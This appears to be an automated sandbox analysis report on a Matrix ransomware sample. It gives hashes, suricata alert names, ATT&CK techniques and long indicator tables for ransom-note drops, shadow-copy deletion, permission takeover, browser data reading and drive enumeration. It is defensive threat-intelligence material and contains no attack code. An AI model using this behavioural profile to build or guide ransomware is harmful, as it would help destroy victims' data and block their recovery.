matrix | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1

Analysis

max time kernel
155s
max time network
119s
platform
windows7_x64
resource
win7-en-20211208
submitted
01/02/2022, 08:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Size

1.2MB
MD5

c82d64850d35cc6a536c11adbd261cf6
SHA1

9f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512

777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002

Score

10^/10

matrix discovery persistence ransomware spyware stealer suricata upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\fr-FR\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\hrtfs\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\modules\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\Favorites\Links\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Public\Pictures\Sample Pictures\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Chess\ja-JP\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Mahjong\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\art\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Chess\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Purble Place\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre7\lib\fonts\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\lua\extensions\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ryugmcli.default-release\OfflineCache\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\Favorites\Microsoft Websites\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Mahjong\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Public\Recorded TV\Sample Media\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryugmcli.default-release\storage\permanent\chrome\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Google\Update\Install\{920B63DC-D088-44C4-8453-54E1AD8D662D}\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Solitaire\ja-JP\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	1984	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	ITjElT8m64.exe

Executes dropped EXE 64 IoCs

pid	Process
1328	NWrfEHHB.exe
1720	ITjElT8m.exe
540	ITjElT8m.exe
968	ITjElT8m.exe
1436	ITjElT8m64.exe
432	ITjElT8m.exe
1156	ITjElT8m.exe
1692	ITjElT8m.exe
1744	ITjElT8m.exe
592	ITjElT8m.exe
1664	ITjElT8m.exe
636	ITjElT8m.exe
1092	ITjElT8m.exe
1696	ITjElT8m.exe
908	ITjElT8m.exe
1500	ITjElT8m.exe
1716	ITjElT8m.exe
1912	ITjElT8m.exe
432	ITjElT8m.exe
1844	ITjElT8m.exe
1692	ITjElT8m.exe
984	ITjElT8m.exe
1364	ITjElT8m.exe
968	ITjElT8m.exe
772	ITjElT8m.exe
1128	ITjElT8m.exe
1292	ITjElT8m.exe
2044	ITjElT8m.exe
1148	ITjElT8m.exe
1676	ITjElT8m.exe
1500	ITjElT8m.exe
432	ITjElT8m.exe
1984	ITjElT8m.exe
1080	ITjElT8m.exe
1128	ITjElT8m.exe
1588	ITjElT8m.exe
1544	ITjElT8m.exe
1364	ITjElT8m.exe
1920	ITjElT8m.exe
716	ITjElT8m.exe
432	ITjElT8m.exe
872	ITjElT8m.exe
1080	ITjElT8m.exe
940	ITjElT8m.exe
336	ITjElT8m.exe
1968	ITjElT8m.exe
2032	ITjElT8m.exe
1116	ITjElT8m.exe
1908	ITjElT8m.exe
1984	ITjElT8m.exe
1748	ITjElT8m.exe
660	ITjElT8m.exe
2000	ITjElT8m.exe
2040	ITjElT8m.exe
1676	ITjElT8m.exe
1648	ITjElT8m.exe
1064	ITjElT8m.exe
1912	ITjElT8m.exe
1128	ITjElT8m.exe
1888	ITjElT8m.exe
2032	ITjElT8m.exe
1108	ITjElT8m.exe
1156	ITjElT8m.exe
1100	ITjElT8m.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001267c-67.dat	upx
behavioral1/files/0x000600000001267c-68.dat	upx
behavioral1/files/0x000600000001267c-69.dat	upx
behavioral1/files/0x000600000001267c-71.dat	upx
behavioral1/files/0x000600000001267c-70.dat	upx
behavioral1/files/0x000600000001267c-74.dat	upx
behavioral1/files/0x000600000001267c-75.dat	upx
behavioral1/files/0x000600000001267c-80.dat	upx
behavioral1/files/0x000600000001267c-79.dat	upx
behavioral1/files/0x000600000001267c-82.dat	upx
behavioral1/files/0x000600000001267c-83.dat	upx
behavioral1/files/0x000600000001267c-86.dat	upx
behavioral1/files/0x000600000001267c-85.dat	upx
behavioral1/files/0x000600000001267c-88.dat	upx
behavioral1/files/0x000600000001267c-89.dat	upx
behavioral1/files/0x000600000001267c-92.dat	upx
behavioral1/files/0x000600000001267c-91.dat	upx
behavioral1/files/0x000600000001267c-94.dat	upx
behavioral1/files/0x000600000001267c-95.dat	upx
behavioral1/files/0x000600000001267c-97.dat	upx
behavioral1/files/0x000600000001267c-98.dat	upx
behavioral1/files/0x000600000001267c-100.dat	upx
behavioral1/files/0x000600000001267c-101.dat	upx
behavioral1/files/0x000600000001267c-103.dat	upx
behavioral1/files/0x000600000001267c-104.dat	upx
behavioral1/files/0x000600000001267c-106.dat	upx
behavioral1/files/0x000600000001267c-107.dat	upx
behavioral1/files/0x000600000001267c-109.dat	upx
behavioral1/files/0x000600000001267c-110.dat	upx
behavioral1/files/0x000600000001267c-113.dat	upx
behavioral1/files/0x000600000001267c-112.dat	upx
behavioral1/files/0x000600000001267c-115.dat	upx
behavioral1/files/0x000600000001267c-116.dat	upx
behavioral1/files/0x000600000001267c-118.dat	upx
behavioral1/files/0x000600000001267c-119.dat	upx
behavioral1/files/0x000600000001267c-121.dat	upx
behavioral1/files/0x000600000001267c-122.dat	upx
behavioral1/files/0x000600000001267c-124.dat	upx
behavioral1/files/0x000600000001267c-125.dat	upx
behavioral1/files/0x000600000001267c-127.dat	upx
behavioral1/files/0x000600000001267c-128.dat	upx
behavioral1/files/0x000600000001267c-130.dat	upx
behavioral1/files/0x000600000001267c-131.dat	upx
behavioral1/files/0x000600000001267c-134.dat	upx
behavioral1/files/0x000600000001267c-133.dat	upx
behavioral1/files/0x000600000001267c-136.dat	upx
behavioral1/files/0x000600000001267c-137.dat	upx
behavioral1/files/0x000600000001267c-139.dat	upx
behavioral1/files/0x000600000001267c-140.dat	upx
behavioral1/files/0x000600000001267c-142.dat	upx
behavioral1/files/0x000600000001267c-143.dat	upx
behavioral1/files/0x000600000001267c-145.dat	upx
behavioral1/files/0x000600000001267c-146.dat	upx
behavioral1/files/0x000600000001267c-149.dat	upx
behavioral1/files/0x000600000001267c-148.dat	upx

Loads dropped DLL 64 IoCs

pid	Process
1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
1624	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
1716	cmd.exe
1712	cmd.exe
772	cmd.exe
540	ITjElT8m.exe
944	cmd.exe
900	cmd.exe
804	cmd.exe
1088	cmd.exe
832	cmd.exe
1808	cmd.exe
1916	cmd.exe
772	cmd.exe
1648	cmd.exe
604	cmd.exe
1100	cmd.exe
1392	cmd.exe
1732	cmd.exe
1368	cmd.exe
1724	cmd.exe
1532	cmd.exe
1720	cmd.exe
1496	cmd.exe
432	cmd.exe
1524	cmd.exe
1692	cmd.exe
940	cmd.exe
1580	cmd.exe
1176	cmd.exe
1720	cmd.exe
908	cmd.exe
968	cmd.exe
1740	cmd.exe
1648	cmd.exe
660	cmd.exe
1532	cmd.exe
328	cmd.exe
592	cmd.exe
1660	cmd.exe
1368	cmd.exe
2036	cmd.exe
1276	cmd.exe
772	cmd.exe
1480	cmd.exe
1692	cmd.exe
1948	cmd.exe
1392	cmd.exe
908	cmd.exe
1156	cmd.exe
772	cmd.exe
900	cmd.exe
1092	cmd.exe
812	cmd.exe
1948	cmd.exe
1364	cmd.exe
1080	cmd.exe
1072	cmd.exe
844	cmd.exe
772	cmd.exe
1732	cmd.exe
1092	cmd.exe
1332	cmd.exe
1948	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
432	takeown.exe
1332	takeown.exe
1092	takeown.exe
604	takeown.exe
432	takeown.exe
896	takeown.exe
1144	takeown.exe
780	takeown.exe
844	takeown.exe
1912	takeown.exe
1072	takeown.exe
1500	takeown.exe
1276	takeown.exe
1696	takeown.exe
1696	takeown.exe
1888	takeown.exe
1164	takeown.exe
1148	takeown.exe
1808	takeown.exe
1388	takeown.exe
1808	takeown.exe
1968	takeown.exe
1528	takeown.exe
1616	takeown.exe
1972	takeown.exe
1156	takeown.exe
936	takeown.exe
872	takeown.exe
1496	takeown.exe
1392	takeown.exe
1968	takeown.exe
1900	takeown.exe
1064	takeown.exe
1972	takeown.exe
2040	takeown.exe
716	takeown.exe
1480	takeown.exe
1388	takeown.exe
1744	takeown.exe
2036	takeown.exe
940	takeown.exe
2032	takeown.exe
1700	takeown.exe
932	takeown.exe
1808	takeown.exe
1148	takeown.exe
1888	takeown.exe
1908	takeown.exe
1996	takeown.exe
1480	takeown.exe
812	takeown.exe
872	takeown.exe
1544	takeown.exe
1968	takeown.exe
1808	takeown.exe
1332	takeown.exe
336	takeown.exe
1168	takeown.exe
2032	takeown.exe
900	takeown.exe
2032	takeown.exe
2032	takeown.exe
1772	takeown.exe
1100	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 40 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\E16QEJ8K\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZZZ3YRT4\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VL9MRVWS\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\H2R8HLJC\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	ITjElT8m64.exe
File opened (read-only)	\??\J:	ITjElT8m64.exe
File opened (read-only)	\??\L:	ITjElT8m64.exe
File opened (read-only)	\??\H:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\B:	ITjElT8m64.exe
File opened (read-only)	\??\S:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\M:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\K:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\E:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\N:	ITjElT8m64.exe
